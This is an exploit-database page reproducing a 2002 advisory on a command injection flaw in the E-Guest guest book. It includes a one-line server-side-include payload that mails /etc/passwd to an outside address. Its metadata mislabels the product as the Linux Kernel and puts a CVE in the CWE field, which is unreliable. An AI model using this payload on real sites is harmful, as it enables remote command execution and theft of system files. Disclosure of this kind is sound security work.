header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
SecurityFocus
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Linux Kernel
Affected Version From: E-Guest 1.0
Affected Version To: E-Guest 1.0
Patch Exists: YES
Related CWE: CVE-2002-0991
CPE: o:linux:linux_kernel
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

E-Guest guest book Command Injection Vulnerability

E-Guest guest book is vulnerable to command injection due to insufficient sanitization of user-supplied input. This allows an attacker to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5129/info

E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.

E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->

Navigation

Suggest Exploit

Services By CQR